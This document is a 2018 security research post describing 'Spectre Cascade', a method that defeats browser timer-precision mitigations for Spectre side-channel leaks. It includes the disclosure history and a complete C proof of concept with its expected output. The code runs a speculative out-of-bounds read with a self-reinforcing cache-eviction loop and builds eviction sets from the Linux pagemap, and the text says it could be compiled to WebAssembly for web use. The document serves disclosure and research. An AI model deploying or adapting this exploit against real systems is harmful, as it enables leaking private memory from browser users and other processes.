Spectre Cascade – there may be no safe timer mitigation

Created 9th February 2018

The Spectre side channel vulnerability that was disclosed in early January 2018 appeared to require access to very accurate timers in order to be able to ex-filtrate data via the small side effects on the CPU cache. The techniques described here show that there may be no timer threshold precision limit, and that reducing timer precision and fuzzing the timer may not be able to slow the rate at which this information can be leaked. A proof of concept is included that illustrates the technique and it has been very effective on at least on some Intel CPUs. The techniques may also add new tools to the art in this area. Obviously the technique does not work on all processors, but where the Spectre out-of-bounds vulnerability exists this technique appears likely to be effective too.

Mozilla disclosed the Speculative execution side-channel attack on the 4 January 2018 and notes mitigations for Firefox being to reduce the precision of performance.now() from 5μs to 20μs, and the SharedArrayBuffer feature was disabled because it can be used to construct a high-resolution timers. The Mozilla blog post on the 3rd January 2018 also describes the Mitigations landing for new class of timing attack. The timer precision has been given a configuration setting in bug 1424341 namely the privacy.reduceTimerPrecision and privacy.reduceTimerPrecision.microseconds preferences, but as at the time of this publication that setting is still set at 20usec.

The Google chromium project landed changes to reduce the resolution of performance.now() from 5us to 100us and add pseudorandom jitter on top, and the comments in that commit note “Deterministically clamp the time value time_seconds to a 100us interval to prevent timing attacks.”

The techniques describe here are an extension of the Spectre side channel out-of-bounds vulnerability to bypass mitigations that limit the accuracy of timers. This contribution is focused on the ex-filtration side of an attack, that is leaking the small effects on the cache timing, and an effective attack also requires infiltration which is not considered here. By showing that the cache timing effects can be ex-filtrated it is hoped that the critical importance of blocking infiltration will be recognized, rather than being seen as only a defense in depth, and that the community will give more attention to code generation.

The timing effects on the cache from a load in a speculative path is small. Decreasing timer precision appear to be effective at blocking the measurement of such small times. In order to bypass such mitigations a larger time difference needs to be created. One simple approach would be to load from a larger set of memory locations in the speculative path, and to tend to accumulate a cache state that leads to a larger timing difference when later measured in one block. This simple approach is limited by the practical impact that it can made on the cache, the cache size is limited, so there would still be a timer precision threshold that would block these measurements. Another challenge in such attacks is to have a supply of evicted cache lines to use to create speculation, and the amount of memory that can be used for this might be practically finite and these loads might conflict with the cache timing effects that are trying to be accumulated. This simple approach is also rather inefficient having multiple stages: a probing and accumulating stage, followed by a measuring stage, and perhaps another stage to perform eviction.

The solution proposed here is to use loads within the speculative path to either support or evict from the set of addresses that are used to create the speculation that leads to these in future. This creates a feedback loop that can either keep the set being loaded in the cache and allowing the loop to run quickly, or alternatively loading from other cache lines in the same set tending to evict from the set being loaded and causing the loop to run slowly. This creates a loop that has a significant run time difference depending on the probes in a speculatively executed path. When the feedback tends to keep the set in the cache there will be less speculation and less probing, and just to make sure it does some proving at the start the lines are evicted at the start of each timing run. The timing difference is not limited and scales with the number of iterations. The number of iterations might be calibrated to achieve an adequate error rate on some known data. The technique does not suffer from the challenge of supplying an ongoing pool of evicted cache lines to generate speculation as it is self sustaining and it does naturally reduce speculation in one of its states. The technique demonstrated in the proof of concept below uses only one cache set, so does not clobber the cache either, it is a small and efficient loop producing a clear timing difference.

This technique creates a useful building block. A branch can depend on multiple loads, combined in one or more previous two input instructions, and this means that speculation occurs if one load OR the other load are slow. This can be used to tune loop feedback and inputs, or to combine separate loops. Some of these approaches have been explored but were not need for the proof of concept.

The technique might also be usable to store the results of probes and to convert a short period of probing into a timing difference measured over a much long period of time. This has not yet been explored, but if workable this would expand the possibilities.

The loads in the speculative path might also be ordered or delayed to effectively measure some very fast event, and to ex-filtrate the result. This might be usable for measuring architectural differences, for fingerprinting a system, etc. This has not been explored and it is not clear if it would be practical but it is easy to see that there is potential here and that is clear from experience of how far speculation reaches.

This technique suits web deployment, an environment badly exposed to these attacks. The code is void of any instructions that would not be available to web code, it does not require a cache flush instruction or any barrier instructions, it is self contained performing it’s own eviction. While this PoC uses the Linux page map to generate a congruent cache set, the techniques for doing so are already well known and have been demonstrated to be workable in a web browser.

The PoC below is written in C but similar code can be trivially compiled into asm.js or WebAssembly to run on the web. The timer precision is rounded to 20us in the example, but to see that it can overcome larger mitigation times just increase the number of iterations in the inner loop. It is capable of working past even the 100msec timer precision used in the Tor web browser but the data rate might be so slow that 100msec is still an effective mitigation (so long as a faster timer can not be found or created).

This issue was disclosed to Google on the 6 February 2018 and receive a thank you and the issue was closed as a duplicate. It was disclosed to Mozilla on the same day and they have so far been dismissive of the originality of the submission and the severity of the security problem, and have not even offered thanks. A few attempts were made to contact Intel for assistance with mitigations and they could not help, and this issue was submitted to them on the 6 February 2018 and received a thank you and no further comment has been received. Web browsers depend on bounds checks to enforce security, and they have just started to address the code generation issues, and the timer mitigations appear to only slow data leaks.

/*
 * Copyright (c) WebLLL.org 2018.
 *
 * Licensed under the Apache License, Version 2.0, January 2004 (the
 * "License"); you may not use this file except in compliance with the
 * License.  You may obtain a copy of the License at
 *
 *      http://www.apache.org/licenses/
 *
 * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
 * EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
 * MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
 * NONINFRINGEMENT. IN NO EVENT SHALL THE CONTRIBUTORS OR COPYRIGHT
 * HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
 * WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
 * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
 * DEALINGS WITH THE SOFTWARE.
 *
 * Spectre 'cascade' proof of concept.
 *
 * This POC runs on Linux 64-bit. It may be built for 64 bit or 32 bit mode:
 * gcc -O -o cascade.out phycolor.c cascade.c
 * gcc -m32 -O -o cascade.out phycolor.c cascade.c
 *
 * The Test machine runs a "Intel(R) Core(TM) i5-4690S CPU @ 3.20GHz"
 * This appears to have a 12 way L3 cache, and the POC is hard coded for this
 * size, although that is not a limitation of this technique.
 *
 * The POC requires access to the Linux page maps to generate the congruent
 * cache sets, and this is generally not accessible, so to running the POC will
 * likely require extra privileges - this is not a limitation of the technique,
 * just a simplification for the PoC.
 *
 * The output of the program on success will be:
 *
 * Putting 'The Magic Words are Squeamish Ossifrage.' in memory
 * Reading 40 bytes:
 * Reading at malicious_x = 0xffffffffffddf530...  => 0x54='T'  0x54='T'
 * Reading at malicious_x = 0xffffffffffddf531...  => 0x68='h'  0x68='h'
 * Reading at malicious_x = 0xffffffffffddf532...  => 0x65='e'  0x65='e'
 * Reading at malicious_x = 0xffffffffffddf533...  => 0x20=' '  0x20=' '
 * Reading at malicious_x = 0xffffffffffddf534...  => 0x4D='M'  0x4D='M'
 * Reading at malicious_x = 0xffffffffffddf535...  => 0x61='a'  0x61='a'
 * Reading at malicious_x = 0xffffffffffddf536...  => 0x67='g'  0x67='g'
 * Reading at malicious_x = 0xffffffffffddf537...  => 0x69='i'  0x69='i'
 * Reading at malicious_x = 0xffffffffffddf538...  => 0x63='c'  0x63='c'
 * Reading at malicious_x = 0xffffffffffddf539...  => 0x20=' '  0x20=' '
 * Reading at malicious_x = 0xffffffffffddf53a...  => 0x57='W'  0x57='W'
 * Reading at malicious_x = 0xffffffffffddf53b...  => 0x6F='o'  0x6F='o'
 * Reading at malicious_x = 0xffffffffffddf53c...  => 0x72='r'  0x72='r'
 * Reading at malicious_x = 0xffffffffffddf53d...  => 0x64='d'  0x64='d'
 * Reading at malicious_x = 0xffffffffffddf53e...  => 0x73='s'  0x73='s'
 * Reading at malicious_x = 0xffffffffffddf53f...  => 0x20=' '  0x20=' '
 * Reading at malicious_x = 0xffffffffffddf540...  => 0x61='a'  0x61='a'
 * Reading at malicious_x = 0xffffffffffddf541...  => 0x72='r'  0x72='r'
 * Reading at malicious_x = 0xffffffffffddf542...  => 0x65='e'  0x65='e'
 * Reading at malicious_x = 0xffffffffffddf543...  => 0x20=' '  0x20=' '
 * Reading at malicious_x = 0xffffffffffddf544...  => 0x53='S'  0x53='S'
 * Reading at malicious_x = 0xffffffffffddf545...  => 0x71='q'  0x71='q'
 * Reading at malicious_x = 0xffffffffffddf546...  => 0x75='u'  0x75='u'
 * Reading at malicious_x = 0xffffffffffddf547...  => 0x65='e'  0x65='e'
 * Reading at malicious_x = 0xffffffffffddf548...  => 0x61='a'  0x61='a'
 * Reading at malicious_x = 0xffffffffffddf549...  => 0x6D='m'  0x6D='m'
 * Reading at malicious_x = 0xffffffffffddf54a...  => 0x69='i'  0x69='i'
 * Reading at malicious_x = 0xffffffffffddf54b...  => 0x73='s'  0x73='s'
 * Reading at malicious_x = 0xffffffffffddf54c...  => 0x68='h'  0x68='h'
 * Reading at malicious_x = 0xffffffffffddf54d...  => 0x20=' '  0x20=' '
 * Reading at malicious_x = 0xffffffffffddf54e...  => 0x4F='O'  0x4F='O'
 * Reading at malicious_x = 0xffffffffffddf54f...  => 0x73='s'  0x73='s'
 * Reading at malicious_x = 0xffffffffffddf550...  => 0x73='s'  0x73='s'
 * Reading at malicious_x = 0xffffffffffddf551...  => 0x69='i'  0x69='i'
 * Reading at malicious_x = 0xffffffffffddf552...  => 0x66='f'  0x66='f'
 * Reading at malicious_x = 0xffffffffffddf553...  => 0x72='r'  0x72='r'
 * Reading at malicious_x = 0xffffffffffddf554...  => 0x61='a'  0x61='a'
 * Reading at malicious_x = 0xffffffffffddf555...  => 0x67='g'  0x67='g'
 * Reading at malicious_x = 0xffffffffffddf556...  => 0x65='e'  0x65='e'
 * Reading at malicious_x = 0xffffffffffddf557...  => 0x2E='.'  0x2E='.'
 */
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <time.h>
#include <sys/types.h>
#include <sys/mman.h>

struct sete {
    uint16_t index;
    uint16_t shift;
};

#define HITPOINTS 4096

struct set {
    size_t size;
    struct sete elem[HITPOINTS];
};

size_t set_offset(struct set *set, size_t i);
void add_set_offset(struct set *set, size_t i, size_t shift);
void add_from_set(struct set *dst, struct set *src, size_t index);
void print_set(struct set *set);
void print_set_phy(struct set *set);


#define MAX_BUFFER_PAGES 4096
extern struct set phy_sets[MAX_BUFFER_PAGES];
extern size_t next_phy_set;

#define PAGE_SIZE 0x1000

void init_pagemap(uint8_t *buffer, size_t size);
void phy_color_pages(uint8_t *buffer, size_t size);


// Timing support.
//
// This is limited to measuring time over a period, start to end, to fit with
// web timer options.

uint64_t time_now_msec()
{
    struct timespec ts;
    clock_gettime(CLOCK_MONOTONIC, &ts);

    uint64_t msec = (ts.tv_sec * 1000000UL + ts.tv_nsec / 1000);

    return msec;
}

static volatile uint64_t start_time_msec;

void time_start()
{
    // Quantize to 20 usec as an example, however this technique will work with
    // much less accuate timers.
    start_time_msec = (time_now_msec() / 20) * 20;
}

uint32_t time_end()
{
    uint64_t end_time_msec = (time_now_msec() / 20) * 20;
    return end_time_msec - start_time_msec;
}


// This is an array which will be accessed out-of-bounds as an example.
size_t array1_size = 16;
uint8_t unused1[64]; // just some fill around array1
volatile uint8_t array1[160] = {0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0};
uint8_t unused2[64]; // just some fill around array1

// The data to be access via array1 above, and out-of-bounds.
char* secret = "The Magic Words are Squeamish Ossifrage.";

// The string of character with equal one and zeros, quick calibration hack.
char* calib_string = "UUUUUUUU";

// A large buffer, page aligned, holding at least one cache congruent set.
volatile uint8_t *array2;


// Data, stored in a separate cache set, that is expected to always be loaded.
struct cycledat {
    // Offset of line to sample from subset A.
    uint32_t offset1;

    // Load offsets on the post-branch patch. The first 16 are offsets loaded on
    // either a branch training cycle, or a malicious bit zero, and are offsets
    // in subset A which reinforced the loading and retention of this subset in
    // the cache set. The later 16 are loaded on a malicious bit one path, and
    // are from subset B and are loaded to evict subset A from the cache.
    uint32_t evict[32];
};


// The is the number of elements in subset A to cycle over. The test computer
// has a 12 way L3 cache, but when cycling over all of these some excess
// evictions were observed in the state in which evictions were not
// expected. This might be due to other uses of the set or perhaps the
// prefetcher. In any case lowering this slightly might give a better signal to
// noise ratio.
#define CYCLE_SIZE 11

// The addresses to use are dynamically generated in this POC.  These should be
// placed in a set distinct from the set being cycled over - that seems unlikely
// for this POC, so it omits that logic.
struct cycledat cycle_info[CYCLE_SIZE];

// Helper to stop code elimination.
volatile uint32_t temp;

// This function is the core of the submission, a loop with a distinctly
// different run time based on the cache state, by creating a feedback loop.
//
// One 'bit' is sampled at the malicious offset.
//
uint32_t readMemoryBit(size_t malicious_x, uint8_t bit)
{
    // Load all the data needed, trying to get it cached.
    for (size_t n = 0; n < 100; n++) {
        for (size_t i = 0; i < CYCLE_SIZE; i++) {
            struct cycledat *info = &cycle_info[i];
            for (size_t j = 0; j < 32; j++) {
                temp &= info->evict[j];
            }
            // Load the subset B cache set lines, tending to evict subset A
            // lines and thus generate early branch speculation to probe the
            // malicious address.
            for (size_t j = 16; j < 32; j++) {
                array2[info->evict[j]];
            }
        }
    }

    // Time in one block.
    time_start();
    size_t cycle_index = 0;
    uint32_t rng = 1;

    // The number of iterations can be increased to overcome timer mitigation
    // and there is no limit.
    for (size_t tries = 1; tries < 20000; tries++) {
        // Pseudo random number generator to defeat branch prediction below.
        rng ^= rng << 13;
        rng ^= rng >> 17;
        rng ^= rng << 5;

        // Occasionally and randomly generate a mask=-1 else mask=0 These are
        // the occasions at which the branch has been trained to miss and the
        // malicious access occurs.
        size_t mask = ((rng & 0x0fUL) - 1UL) & ~0xffffUL;
        mask = (mask | (mask >> 16));

        // Cycle through subset A.
        cycle_index = (cycle_index + (mask & 1)) % CYCLE_SIZE;

        // When the mask is set, swap the training index of zero for the
        // malicious index that may accessed out of bounds.
        size_t x = mask & malicious_x;

        struct cycledat *info = &cycle_info[cycle_index];

        // The addresses are loaded from cached memory, so can be dynamically
        // generated and ordered to avoid the pre-fetcher.
        size_t index = info->offset1;

        // *** This is the load that causes the branch speculation that is exploited. ***
        // It loads from an element of set A.
        size_t e = array2[index];

        if (x < e) {
            // This path is taken during training and hopefully also when
            // probing the malicious address. When training x is zero and within
            // bounds. No eviction occurs during training. Eviction only occurs
            // on a probe and if the bit probed is a one.
            uint8_t v = array1[x];

            // Extract the bit of interest and convert to an index into the eviction set.
            v = (v >> bit) & mask & 1;
            size_t w = v * 16;

            // Load from the one of two subsets, either re-inforcing subset A or evicting subset A.
            array2[info->evict[w]];
            array2[info->evict[w + 1]];
            array2[info->evict[w + 2]];
            array2[info->evict[w + 3]];
            array2[info->evict[w + 4]];
            array2[info->evict[w + 5]];
            array2[info->evict[w + 6]];
            array2[info->evict[w + 7]];
            array2[info->evict[w + 8]];
            array2[info->evict[w + 9]];
            array2[info->evict[w + 10]];
            array2[info->evict[w + 11]];
            array2[info->evict[w + 12]];
            array2[info->evict[w + 13]];
            array2[info->evict[w + 14]];
            array2[info->evict[w + 15]];
        }
    }

    return time_end();
}


// Much of the code below is not critical to the submission. It adds a skeleton
// to calibrate the times at the start and to repeat measurements to reduce
// errors, but there are many alternative approaches such as continuous
// calibration.

// How many times to repeat the above measurment to reduce noise.
#define RETRIES 4

uint32_t calibrate()
{
    uint32_t sum = 0;

    // Time a string of characters with an equal number of ones and zeros and take
    // the average for calibration. This might drift if the CPU frequency or load
    // changes - it is sufficient for a POC.
    size_t malicious_x = (size_t)(calib_string - (char *)array1);
    ssize_t len = strlen(calib_string);

    for (size_t j = 0; j < len; j++) {
        for (size_t i = 0; i < 8; i++) {
            uint32_t min_time = 0xffffffff;
            for (size_t k = 0; k < RETRIES * 2; k++) {
                uint32_t time = readMemoryBit(malicious_x, i);
                if (time < min_time) {
                    min_time = time;
                }
            }
            sum += min_time;
        }
        malicious_x++;
    }

    return sum / (len * 8);
}

uint32_t run(size_t malicious_x, ssize_t len)
{
    size_t j;

    uint32_t calib = calibrate();

    printf("Reading %zd bytes:\n", len);
    j = 0;
    while (--len >= 0)
    {
        printf("Reading at malicious_x = %p... ", (void *)malicious_x);
        uint8_t byte = 0;

        uint32_t min_times[8];
        for (size_t i = 0; i < 8; i++) {
            min_times[i] = 0xffffffff;
        }
        for (size_t k = 0; k < RETRIES; k++) {
            // Could also perform some calibration samples
            for (size_t i = 0; i < 8; i++) {
                uint32_t time = readMemoryBit(malicious_x, i);
                if (time < min_times[i]) {
                    min_times[i] = time;
                }
            }

            // Could analyse the samples and repeat if quality issues are detect.
            byte = 0;
            for (size_t i = 0; i < 8; i++) {
                uint8_t bit = min_times[i] > calib;
                byte |= bit << i;
            }
        }

        printf(" => 0x%02X='%c'  0x%02X='%c'\n", array1[malicious_x], array1[malicious_x], byte, byte);
        malicious_x++;
        j++;
    }

    return 0;
}

int main(int argc, const char **argv)
{
    size_t array2_len = 0x2000000;

    array2 = mmap(NULL, array2_len, PROT_READ | PROT_WRITE, MAP_PRIVATE
                  | MAP_ANONYMOUS | MAP_POPULATE, -1, 0);

    // Find congruent sets. These addresses are deliberately spaced apart which
    // appears to defeat negative impacts of pre-fetching.
    //
    // On the web an alternative is needed, but the methods are well published
    // and do not depend on the measurement of small times, that is a potential
    // congruent set can be walked as many times as need to generate a
    // significant time to overcome timer mitigation although this can be
    // slowed. The 20usec mitigation time is far from sufficient to slow this
    // discovery in practice.
    init_pagemap((void *)array2, array2_len);
    phy_color_pages((void *)array2, array2_len);

    // Choose a set to experiment with, just use the first.
    struct set *set = &phy_sets[0];

    size_t set_size = set->size;
    if (set_size >= 128) {
        set_size = 128;
    }

    // Divide this set into two.

    size_t subset_a[CYCLE_SIZE];
    size_t subset_b[128];
    size_t subset_b_size = 0;

    // Subset A.
    for (size_t i = 0; i < CYCLE_SIZE; i++) {
        subset_a[i] = set_offset(set, i);
    }

    // Subset B - all the rest.
    // A sufficiently large congruent set is required.
    for (size_t i = 0; i < 128; i++) {
        size_t j = i + CYCLE_SIZE;
        if (j >= set_size) {
            subset_b_size = i;
            break;
        }
        subset_b[i] = set_offset(set, i);
    }

    // Set up the cycleinfo.  This data is expected to be retained in the
    // cache. It holds the target addresses from which to load.

    // The main loop cycles through subset A of the congruent set. These are the
    // lines read by the load causing the exploited branch.  The set must be at
    // most the number of cache ways, and setting this a little less was found
    // to be helpful. These address are stored in the 'offset1' slot.
    for (size_t i = 0; i < CYCLE_SIZE; i += 1) {
        cycle_info[i].offset1 = subset_a[i];
    }

    // The post-branch code path reads from one of two subsets and one is subset
    // A. This is the same set as defined just above, and loading these in the
    // post-branch path helps load and retain these lines in the cache set,
    // which in turn avoids a delayed load leading to a faster run time for the
    // loop - self reinforcing.
    for (size_t i = 0; i < CYCLE_SIZE; i++) {
        for (size_t j = 0; j < 16; j++) {
            size_t k = (i + j + 1) % CYCLE_SIZE;
            cycle_info[i].evict[j] = cycle_info[k].offset1;
        }
    }

    // The post-branch code path may read from an alternative subset B. Loading
    // this subset tends to evict the lines of subset A which cause a delayed
    // load by the main loop and slows the run time for the main loop. When
    // subset A is evicted this also supports the branch speculation need for
    // the malicious probing, the infiltration.
    size_t next_b = 0;
    for (size_t i = 0; i < CYCLE_SIZE; i++) {
        size_t next_b2 = next_b;
        next_b += 3;
        if (next_b >= subset_b_size) {
            next_b -= subset_b_size;
        }
        for (size_t j = 16; j < 32; j++) {
            cycle_info[i].evict[j] = subset_b[next_b2];
            next_b2++;
            if (next_b2 >= subset_b_size) {
                next_b2 -= subset_b_size;
            }
        }
    }

    printf("Putting '%s' in memory\n", secret);
    size_t malicious_x = (size_t)(secret - (char *)array1);
    size_t len = strlen(secret);

    // The example array lengths.
    for (size_t i = 0; i < array2_len; i++) {
        array2[i] = 16;
    }

    run(malicious_x, len);

    return 0;
}

/*
 * Copyright (c) WebLLL.org 2018.
 *
 * Licensed under the Apache License, Version 2.0, January 2004 (the
 * "License"); you may not use this file except in compliance with the
 * License.  You may obtain a copy of the License at
 *
 *      http://www.apache.org/licenses/
 *
 * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
 * EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
 * MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
 * NONINFRINGEMENT. IN NO EVENT SHALL THE CONTRIBUTORS OR COPYRIGHT
 * HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
 * WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
 * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
 * DEALINGS WITH THE SOFTWARE.
 *
 * Support for using the physical address to determine a page color
 * and to build congruent cache sets. This would obviously not work on
 * the web, but time base discovery methods are well published, and
 * this file is not an original part of this submission. The code here
 * is quick and reliable allowing focus on the other code, and a
 * simply POC.
 */

#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stdbool.h>
#include <sys/mman.h>
#include <inttypes.h>

#define SET_SIZE 4096

struct sete {
    uint16_t index;
    uint16_t shift;
};

struct set {
    size_t size;
    struct sete elem[SET_SIZE];
};

size_t set_offset(struct set *set, size_t i)
{
    struct sete *elem = &set->elem[i];
    return elem->index << elem->shift;
}

void add_set_offset(struct set *set, size_t i, size_t shift)
{
    size_t size = set->size;
    struct sete *elem = &set->elem[size];
    elem->index = i;
    elem->shift = shift;
    set->size = size + 1;
}

void add_from_set(struct set *dst, struct set *src, size_t index)
{
    size_t dst_size = dst->size;
    struct sete *dst_elem = &dst->elem[dst_size];
    struct sete *src_elem = &src->elem[index];
    dst_elem->index = src_elem->index;
    dst_elem->shift = src_elem->shift;
    dst->size = dst_size + 1;
}

// The target cache ways is hard coded - adapt to the development system.
#define CACHE_WAYS 12

#define PAGE_SIZE 4096
#define PAGE_SIZE_SHIFT 12
int g_pagemap_fd = -1;

// Pre-loaded page map
#define MAX_BUFFER_PAGES 8192
static uint64_t pagemap[MAX_BUFFER_PAGES];

static uint8_t *mapped_buffer;
static size_t mapped_buffer_size;

uint64_t get_physical_addr(uintptr_t virtual_addr);

void init_pagemap(uint8_t *buffer, size_t size) {
    size_t pages = size / PAGE_SIZE;

    g_pagemap_fd = open("/proc/self/pagemap", O_RDONLY);
    if (g_pagemap_fd < 0) {
        printf("Error opening pagemap\n");
        return;
    }

    if (size / PAGE_SIZE > sizeof(pagemap)) {
        printf("error pagemap too small requires %zu got %zu\n", sizeof(pagemap), size / PAGE_SIZE);
        return;
    }

    mapped_buffer = buffer;
    mapped_buffer_size = size;

    // Make sure it is all paged in.
    for (size_t n = 0; n < pages; n += PAGE_SIZE) {
        mapped_buffer[n] = 1;
    }

    for (size_t i = 0; i < pages; i++) {
        uintptr_t virtual_addr = ((uintptr_t)buffer) + i * 4096;
        off_t offset = (virtual_addr / PAGE_SIZE) * 8;
        uint64_t value;
        int got = pread(g_pagemap_fd, &value, 8, offset);
        if (got != 8) {
            printf("error read %u %zx %"PRIxPTR" %lx %zu %p\n", got, i, virtual_addr, offset, mapped_buffer_size / PAGE_SIZE, buffer);
            break;
        }
        uint64_t frame_num = value & ((1ULL << 54) - 1);
        if (frame_num == 0) {
            printf("error physical address undefined for virtual address %"PRIxPTR"\n", virtual_addr);
        }
        if ((value & (1ULL << 63)) == 0) {
            printf("page not present vaddr %"PRIxPTR"\n", virtual_addr);
        }
        pagemap[i] = value;
    }
}

uint64_t get_physical_addr(uintptr_t virtual_addr) {
    off_t page = (virtual_addr - (uintptr_t)(mapped_buffer)) / PAGE_SIZE;

    if (page > (mapped_buffer_size / PAGE_SIZE)) {
        printf("get_physical_addr outside buffer %"PRIxPTR"\n", virtual_addr);
        return 0;
    }
    uint64_t frame_num = pagemap[page] & ((1ULL << 54) - 1);
    return (frame_num * PAGE_SIZE) | (virtual_addr & (PAGE_SIZE - 1));
}

int get_cache_slice(uint64_t phys_addr, int bad_bit) {
    // From: Reverse Engineering Intel Last-Level Cache Complex Addressing Using Performance Counters

    static const int bits1[] = { 6, 10, 12, 14, 16, 17, 18, 20, 22, 24, 25, 26, 27, 28, 30, 32, 33 };
    static const int bits2[] = { 7, 11, 13, 15, 17, 19, 20, 21, 22, 23, 24, 26, 28, 29, 31, 33, 34 };

    int count = sizeof(bits1) / sizeof(bits1[0]);
    int h1 = 0, h2 = 0;
    for (int i = 0; i < count; i++) {
        h1 ^= (phys_addr >> bits1[i]) & 1;
        h2 ^= (phys_addr >> bits2[i]) & 1;
    }
    if (bad_bit != -1) {
        h1 ^= (phys_addr >> bad_bit) & 1;
    }
    return (h1 << 1) | h2;
}

bool in_same_cache_set(uint64_t phys1, uint64_t phys2, int bad_bit) {
    // Assuming the bottom 17 bits determine the cache set within the
    // cache slice (or the location within a cache line), and the low 6
    // bits which are the offset in the line.
    uint64_t mask = (((uint64_t) 1 << 17) - 1) & ~0x3f;
    int slice1 = get_cache_slice(phys1, bad_bit);
    int slice2 = get_cache_slice(phys2, bad_bit);
    return ((phys1 & mask) == (phys2 & mask) && (slice1 == slice2));
}

int make_cache_set(struct set *set, size_t index0, int addr_count)
{
    set->size = 0;
    uint64_t phys1 = get_physical_addr((uintptr_t)&mapped_buffer[index0 * PAGE_SIZE]);
    add_set_offset(set, index0, PAGE_SIZE_SHIFT);
    size_t max_pages = mapped_buffer_size / PAGE_SIZE;

    int found = 1;
    size_t index = 1;
    while (found < addr_count) {
        if (index >= max_pages) {
            printf("failed %zu %zu\n", index, max_pages);
            return 0;
        }
        if (index == index0) {
            index++;
            continue;
        }
        uintptr_t addr = (uintptr_t)&mapped_buffer[index * PAGE_SIZE];
        uint64_t phys2 = get_physical_addr(addr);
        if (in_same_cache_set(phys1, phys2, -1)) {
            add_set_offset(set, index, PAGE_SIZE_SHIFT);
            found++;
        }

        index++;
    }
    return 1;
}


// Could limit this to 128 for some CPUs
struct set phy_sets[MAX_BUFFER_PAGES];
size_t next_phy_set = 0;

static struct set * page_sets[MAX_BUFFER_PAGES];

void phy_color_pages(uint8_t *buffer, size_t size)
{
    memset(page_sets, 0, sizeof(page_sets));

    size_t base_page = 0;
    for (;; base_page++) {
        for (; base_page < mapped_buffer_size / PAGE_SIZE; base_page++) {
            if (page_sets[base_page] == NULL) {
                break;
            }
        }

        if (base_page >= mapped_buffer_size / PAGE_SIZE) {
            break;
        }

        if (make_cache_set(&phy_sets[next_phy_set], base_page, CACHE_WAYS)) {
            for (size_t i = 0; i < phy_sets[next_phy_set].size; i++) {
                size_t index = phy_sets[next_phy_set].elem[i].index;
                size_t shift = phy_sets[next_phy_set].elem[i].shift;
                size_t page = (index << shift) / PAGE_SIZE;
                page_sets[page] = &phy_sets[next_phy_set];
            }

            uint64_t base_phys = get_physical_addr((uintptr_t)&mapped_buffer[base_page * PAGE_SIZE]);
            for (size_t page = 0; page < mapped_buffer_size / PAGE_SIZE; page++) {
                if (page_sets[page] == NULL) {
                    uint64_t page_phys = get_physical_addr((uintptr_t)&mapped_buffer[page * PAGE_SIZE]);
                    int check = in_same_cache_set(base_phys, page_phys, -1);

                    if (check) {
                        add_set_offset(&phy_sets[next_phy_set], page, PAGE_SIZE_SHIFT);
                        page_sets[page] = &phy_sets[next_phy_set];
                    }
                }
            }
            next_phy_set++;
        } else {
            printf("failed to make set from page %zu\n", base_page);
        }
    }
}